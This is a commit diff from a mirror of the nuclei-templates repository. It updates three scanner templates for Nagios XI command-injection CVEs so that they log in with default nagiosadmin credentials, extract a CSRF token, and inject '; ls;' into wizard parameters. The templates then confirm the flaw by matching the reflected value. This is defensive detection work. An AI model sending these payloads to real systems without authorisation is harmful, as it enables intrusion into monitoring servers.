daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Complete template matching conditions with authentication

patch-1
Matthew Dunn 2023-01-28 10:16:06 -05:00
parent b6aeca9092
commit 18a6768469
3 changed files with 100 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
cves/2021/CVE-2021-25296.yaml
View File

@ -14,9 +14,39 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-25296
cwe-id: CWE-78
tags: cve,cve2021,nagiosxi
tags: cve,cve2021,nagiosxi,authenticated
requests:
- method: GET
path:
- "{{BaseUrl}}/nagiosxi/config/monitoringwizard.php?update=1&nextstep=3&wizard=windowswmi&plugin_output_len=9999;"
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp_token}}&page=auth&debug=&pageopt=login&username=nagiosadmin&password=nagiosadmin&loginButton=Login
- |
GET /nagiosxi/config/monitoringwizard.php?update=1nsp={{nsp_token}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3b%20ls%3b HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<input type="hidden" name="plugin_output_len" value="9999; ls;">'
- "<input type='hidden' name='plugin_output_len' value='9999; ls;'>"
extractors:
- type: regex
part: body
name: nsp_token
group: 1
internal: true
regex:
- '<input type="hidden" name="nsp" value="(.*)">'
- "<input type='hidden' name='nsp' value='(.*)'>"

36
cves/2021/CVE-2021-25297.yaml
View File

@ -17,6 +17,36 @@ info:
tags: cve,cve2021,nagiosxi
requests:
- method: GET
path:
- "{{BaseUrl}}/nagiosxi/config/monitoringwizard.php?update=1&ipaddress=127.0.0.1&nextstep=4&wizard=digitalocean"
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp_token}}&page=auth&debug=&pageopt=login&username=nagiosadmin&password=nagiosadmin&loginButton=Login
- |
GET /nagiosxi/config/monitoringwizard.php?update=1nsp={{nsp_token}}&ip_address=127.0.0.1%3b%20ls%3b&nextstep=4&wizard=digitalocean HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<input type="hidden" name="ip_address" value="127.0.0.1; ls;">'
- "<input type='hidden' name='ip_address' value='127.0.0.1; ls;'>"
extractors:
- type: regex
part: body
name: nsp_token
group: 1
internal: true
regex:
- '<input type="hidden" name="nsp" value="(.*)">'
- "<input type='hidden' name='nsp' value='(.*)'>"

36
cves/2021/CVE-2021-25298.yaml
View File

@ -17,6 +17,36 @@ info:
tags: cve,cve2021,nagiosxi
requests:
- method: GET
path:
- "{{BaseUrl}}/nagiosxi/config/monitoringwizard.php?update=1&ipaddress=127.0.0.1&nextstep=4&wizard=digitalocean"
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp_token}}&page=auth&debug=&pageopt=login&username=nagiosadmin&password=nagiosadmin&loginButton=Login
- |
GET /nagiosxi/config/monitoringwizard.php?update=1nsp={{nsp_token}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20ls%3b HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<input type="hidden" name="ip_address" value="127.0.0.1; ls;">'
- "<input type='hidden' name='ip_address' value='127.0.0.1; ls;'>"
extractors:
- type: regex
part: body
name: nsp_token
group: 1
internal: true
regex:
- '<input type="hidden" name="nsp" value="(.*)">'
- "<input type='hidden' name='nsp' value='(.*)'>"